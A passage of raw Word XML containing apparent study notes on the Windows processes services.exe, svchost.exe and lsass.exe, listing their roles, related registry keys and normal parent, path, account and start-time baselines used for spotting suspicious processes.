        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D027F7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>User Account</w:t>
      </w:r>
      <w:r w:rsidRPr="00D027F7">
        <w:t>: Local System</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA117FE" w14:textId="7AB64264" w:rsidR="00D027F7" w:rsidRPr="00D027F7" w:rsidRDefault="00D027F7" w:rsidP="00D027F7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D027F7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Start Time: </w:t>
      </w:r>
      <w:r w:rsidRPr="00D027F7">
        <w:t>Within seconds of boot time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C3F3DCF" w14:textId="77777777" w:rsidR="00D027F7" w:rsidRDefault="00D027F7" w:rsidP="00B9714C">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28ABBDFF" w14:textId="77777777" w:rsidR="00B9714C" w:rsidRDefault="00B9714C" w:rsidP="00BB02F3">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="706AD33B" w14:textId="77777777" w:rsidR="009134EF" w:rsidRDefault="009134EF" w:rsidP="009134EF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E0C445" w14:textId="3C5E4163" w:rsidR="001C6C48" w:rsidRDefault="001920A9" w:rsidP="00AF40ED">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF40ED">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">services.exe </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00AF40ED" w:rsidRPr="00AF40ED">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Service Control Manager </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="00AF40ED" w:rsidRPr="00AF40ED">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SCM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>”)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48139155" w14:textId="30182826" w:rsidR="00AF40ED" w:rsidRDefault="00AF40ED" w:rsidP="00AF40ED">
      <w:r>
        <w:tab/>
        <w:t>Initiated by wininit.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C1B53D1" w14:textId="3FFB4163" w:rsidR="00AF40ED" w:rsidRDefault="00AF40ED" w:rsidP="00AF40ED">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00AF40ED">
        <w:t xml:space="preserve">responsibility is to </w:t>
      </w:r>
      <w:r w:rsidRPr="00AF40ED">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>handle system services</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF40ED">
        <w:t>loading, interacting with</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00AF40ED">
        <w:t>starting or ending services</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A57ADEE" w14:textId="242D3863" w:rsidR="00AF40ED" w:rsidRDefault="00AF40ED" w:rsidP="00AF40ED">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">to Run it to manage services from CMD: &gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00AF40ED">
        <w:t>sc.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B5EEC62" w14:textId="776D25C2" w:rsidR="00AF40ED" w:rsidRDefault="00AF40ED" w:rsidP="00AF40ED">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00AF40ED">
        <w:t>services Information is stored in registry </w:t>
      </w:r>
      <w:r w:rsidRPr="00197AF3">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="D1D1D1" w:themeFill="background2" w:themeFillShade="E6"/>
        </w:rPr>
        <w:t>HKLM\System\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00197AF3">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="D1D1D1" w:themeFill="background2" w:themeFillShade="E6"/>
        </w:rPr>
        <w:t>CurrentControlSet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00197AF3">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="D1D1D1" w:themeFill="background2" w:themeFillShade="E6"/>
        </w:rPr>
        <w:t>\Services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EED18A2" w14:textId="51C94A1B" w:rsidR="00AF40ED" w:rsidRDefault="002828C8" w:rsidP="002828C8">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="002828C8">
        <w:t>parent to several processes: svchost.exe, spoolsv.exe, msmpeng.exe,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002828C8">
        <w:t>dllhost.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D4F0630" w14:textId="4323941E" w:rsidR="000B0683" w:rsidRDefault="000B0683" w:rsidP="000B0683">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Normal:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67F9270E" w14:textId="0A610EEB" w:rsidR="000B0683" w:rsidRPr="000B0683" w:rsidRDefault="000B0683" w:rsidP="000B0683">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000B0683">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Image Path</w:t>
      </w:r>
      <w:r w:rsidRPr="000B0683">
        <w:t>: %</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000B0683">
        <w:t>SystemRoot</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000B0683">
        <w:t>%\System32\services.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C5C323B" w14:textId="18C2F5EC" w:rsidR="000B0683" w:rsidRPr="000B0683" w:rsidRDefault="000B0683" w:rsidP="000B0683">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000B0683">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Parent Process</w:t>
      </w:r>
      <w:r w:rsidRPr="000B0683">
        <w:t>: wininit.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57FFE72F" w14:textId="79965EE2" w:rsidR="000B0683" w:rsidRPr="000B0683" w:rsidRDefault="000B0683" w:rsidP="000B0683">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000B0683">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Number of Instances</w:t>
      </w:r>
      <w:r w:rsidRPr="000B0683">
        <w:t>: One</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F54E98B" w14:textId="4885F8FB" w:rsidR="000B0683" w:rsidRPr="000B0683" w:rsidRDefault="000B0683" w:rsidP="000B0683">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000B0683">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>User Account</w:t>
      </w:r>
      <w:r w:rsidRPr="000B0683">
        <w:t>: Local System</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47902973" w14:textId="56AD8415" w:rsidR="000B0683" w:rsidRPr="000B0683" w:rsidRDefault="000B0683" w:rsidP="000B0683">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000B0683">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Start Time</w:t>
      </w:r>
      <w:r w:rsidRPr="000B0683">
        <w:t>: Within seconds of boot time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D722043" w14:textId="77777777" w:rsidR="002828C8" w:rsidRDefault="002828C8" w:rsidP="002828C8">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FAA03CB" w14:textId="6E8DCADA" w:rsidR="00BD324B" w:rsidRPr="00234500" w:rsidRDefault="00C74A4E" w:rsidP="00234500">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00234500">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">svchost.exe </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00BD324B" w:rsidRPr="00234500">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Service Host</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="654B7452" w14:textId="793DA76E" w:rsidR="00BD324B" w:rsidRPr="00BD324B" w:rsidRDefault="00BD324B" w:rsidP="00BD324B">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD324B">
        <w:t>wininit.exe &gt; services.exe &gt; svchost.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E1A7189" w14:textId="77777777" w:rsidR="0047300F" w:rsidRDefault="00BD324B" w:rsidP="000D4D14">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD324B">
        <w:t xml:space="preserve">(Host Process for Windows Services), responsible for </w:t>
      </w:r>
      <w:r w:rsidRPr="00BD324B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>hosting and managing Windows services</w:t>
      </w:r>
      <w:r w:rsidRPr="000D4D14">
        <w:t>. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D7E8A97" w14:textId="45EF0408" w:rsidR="00BD324B" w:rsidRDefault="000D4D14" w:rsidP="000D4D14">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="000D4D14">
        <w:t xml:space="preserve">Rather than starting a separate process for each service, Windows groups similar services under a </w:t>
      </w:r>
      <w:r w:rsidRPr="0047300F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>single svchost.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="000D4D14">
        <w:t xml:space="preserve"> to save resources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C72BB02" w14:textId="401C1A8F" w:rsidR="0047300F" w:rsidRPr="000D4D14" w:rsidRDefault="0047300F" w:rsidP="0047300F">
      <w:pPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="003F4DE1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="EE0000"/>
        </w:rPr>
        <w:t>Explain</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: instead of each process run its own services in its own resources and may many processes use or run the same service but in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>it’s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> own resources so the same service is running in many different resources, so instead srchost.exe combine these similar processes together “host them in one place like a room” and enable them to use the resource, these resources “the shared service” that used by processes hosed in svchost.exe are implemented as DDLs saved in Registry Parameters  for this shared service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D05DD52" w14:textId="246071DA" w:rsidR="00234500" w:rsidRPr="00DE4C68" w:rsidRDefault="00AF40ED" w:rsidP="00DE4C68">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="7030A0"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00234500" w:rsidRPr="00234500">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="7030A0"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>The services running in this</w:t>
      </w:r>
      <w:r w:rsidR="008E786A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="7030A0"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> hosted</w:t>
      </w:r>
      <w:r w:rsidR="00234500" w:rsidRPr="00234500">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="7030A0"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> process are implemented as DLLs</w:t>
      </w:r>
      <w:r w:rsidR="00234500">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="7030A0"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1553C6C2" w14:textId="7D707363" w:rsidR="0047300F" w:rsidRPr="0047300F" w:rsidRDefault="000D4D14" w:rsidP="0047300F">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="000D4D14">
        <w:t>These DLLs are loaded by svchost.exe as specified in the registry</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="000D4D14">
        <w:t>Registry Path for a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000D4D14">
        <w:t>Service</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000D4D14">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D1D1D1" w:themeFill="background2" w:themeFillShade="E6"/>
        </w:rPr>
        <w:t>HKLM\SYSTEM\CurrentControlSet\Services\[ServiceName]\Parameters\ServiceDLL</w:t>
      </w:r>
      <w:r w:rsidR="0047300F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0047300F" w:rsidRPr="0047300F">
        <w:t xml:space="preserve">where Windows defines </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0047300F" w:rsidRPr="0047300F">
        <w:t>whi</w:t>
      </w:r>
      <w:r w:rsidR="008E786A">
        <w:t>c</w:t>
      </w:r>
      <w:r w:rsidR="0047300F" w:rsidRPr="0047300F">
        <w:t>ch</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0047300F" w:rsidRPr="0047300F">
        <w:t xml:space="preserve"> DLL a service uses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49E40ED8" w14:textId="5A80AC03" w:rsidR="00234500" w:rsidRPr="00234500" w:rsidRDefault="00234500" w:rsidP="0047300F">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Normal:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55086D00" w14:textId="77777777" w:rsidR="00234500" w:rsidRPr="00DE4C68" w:rsidRDefault="00234500" w:rsidP="00234500">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00234500">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Parent Process: </w:t>
      </w:r>
      <w:r w:rsidRPr="00234500">
        <w:t>services.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="280C007F" w14:textId="7BB4239C" w:rsidR="00DE4C68" w:rsidRPr="00DE4C68" w:rsidRDefault="00DE4C68" w:rsidP="00DE4C68">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE4C68">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Image Path: </w:t>
      </w:r>
      <w:r w:rsidRPr="00DE4C68">
        <w:t>%</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DE4C68">
        <w:t>SystemRoot</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DE4C68">
        <w:t>%\System32\svchost.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F4A8D84" w14:textId="77777777" w:rsidR="00234500" w:rsidRPr="00234500" w:rsidRDefault="00234500" w:rsidP="00234500">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00234500">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Number of Instances: </w:t>
      </w:r>
      <w:r w:rsidRPr="00234500">
        <w:t>Many</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A23C5BD" w14:textId="77777777" w:rsidR="00234500" w:rsidRPr="00234500" w:rsidRDefault="00234500" w:rsidP="00234500">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00234500">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>User Account</w:t>
      </w:r>
      <w:r w:rsidRPr="00234500">
        <w:t>: Varies (SYSTEM, Network Service, Local Service) depending on the svchost.exe instance. In Windows 10, some instances</w:t>
      </w:r>
      <w:r w:rsidRPr="00234500">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00234500">
        <w:t>run as the logged-in user.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3965B3C2" w14:textId="6BB412EE" w:rsidR="00234500" w:rsidRPr="00234500" w:rsidRDefault="00234500" w:rsidP="00234500">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00234500">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Start Time: </w:t>
      </w:r>
      <w:r w:rsidRPr="00234500">
        <w:t>within seconds of boot time. Other instances of svchost.exe can be started after boot.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F897BD5" w14:textId="77777777" w:rsidR="007F3CED" w:rsidRDefault="007F3CED" w:rsidP="007F3CED">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A5DD64F" w14:textId="73A511C0" w:rsidR="009134EF" w:rsidRDefault="007F3CED" w:rsidP="007F3CED">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F3CED">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">lsass.exe </w:t>
      </w:r>
      <w:r w:rsidR="00C74A4E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3CED">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Local Security Authority Subsystem Service </w:t>
      </w:r>
      <w:r w:rsidR="00C74A4E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3CED">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>LSASS</w:t>
      </w:r>
      <w:r w:rsidR="00C74A4E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3CED">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B09E120" w14:textId="0CF1BA37" w:rsidR="007F3CED" w:rsidRDefault="007F3CED" w:rsidP="007F3CED">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="003447BA">
        <w:t>(initiated by wininit.exe)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29061DD2" w14:textId="77777777" w:rsidR="00857FD0" w:rsidRDefault="003447BA" w:rsidP="00857FD0">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00857FD0" w:rsidRPr="00857FD0">
        <w:t> responsible for enforcing the security policy on the system</w:t>
      </w:r>
      <w:r w:rsidR="00857FD0">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00857FD0" w:rsidRPr="00857FD0">
        <w:t>verifies users logging</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="468079C0" w14:textId="77777777" w:rsidR="00857FD0" w:rsidRDefault="00857FD0" w:rsidP="00857FD0">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00857FD0">
        <w:t> handles password changes and creates access tokens.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="685AE5A1" w14:textId="762994CE" w:rsidR="00857FD0" w:rsidRPr="00857FD0" w:rsidRDefault="00857FD0" w:rsidP="00857FD0">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:color w:val="7030A0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00857FD0">
        <w:rPr>
          <w:color w:val="7030A0"/>
        </w:rPr>
        <w:t>writes to the Windows Security Log.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CF37941" w14:textId="5EE39B1E" w:rsidR="009134EF" w:rsidRDefault="006F0D3F" w:rsidP="006F0D3F">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F0D3F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">It creates security tokens </w:t>
      </w:r>
      <w:r w:rsidRPr="006F0D3F">
        <w:t xml:space="preserve">for </w:t>
      </w:r>
      <w:r w:rsidRPr="006F0D3F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SAM (Security Account Manager</w:t>
      </w:r>
      <w:r w:rsidRPr="006F0D3F">
        <w:t>), AD (Active Directory), and NETLOGON</w:t>
      </w:r>
      <w:r w:rsidRPr="006F0D3F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>. It uses authentication packages specified in </w:t>
      </w:r>
      <w:r w:rsidRPr="006F0D3F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:shd w:val="clear" w:color="auto" w:fill="D1D1D1" w:themeFill="background2" w:themeFillShade="E6"/>
        </w:rPr>
        <w:t>HKLM\System\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006F0D3F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:shd w:val="clear" w:color="auto" w:fill="D1D1D1" w:themeFill="background2" w:themeFillShade="E6"/>
        </w:rPr>
        <w:t>CurrentControlSet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006F0D3F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:shd w:val="clear" w:color="auto" w:fill="D1D1D1" w:themeFill="background2" w:themeFillShade="E6"/>
        </w:rPr>
        <w:t>\Control\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006F0D3F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:shd w:val="clear" w:color="auto" w:fill="D1D1D1" w:themeFill="background2" w:themeFillShade="E6"/>
        </w:rPr>
        <w:t>Lsa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006F0D3F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:shd w:val="clear" w:color="auto" w:fill="D1D1D1" w:themeFill="background2" w:themeFillShade="E6"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="637F834F" w14:textId="5FC6A8B9" w:rsidR="009134EF" w:rsidRDefault="006F0D3F" w:rsidP="009134EF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00AA36AC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Normal:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A9AC702" w14:textId="64056746" w:rsidR="00AA36AC" w:rsidRPr="00AA36AC" w:rsidRDefault="00AA36AC" w:rsidP="00AA36AC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA36AC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Image Path</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA36AC">
        <w:t>: %</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AA36AC">
        <w:t>SystemRoot</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AA36AC">
        <w:t>%\System32\lsass.exe</w:t>
      </w:r>
    </w:p>
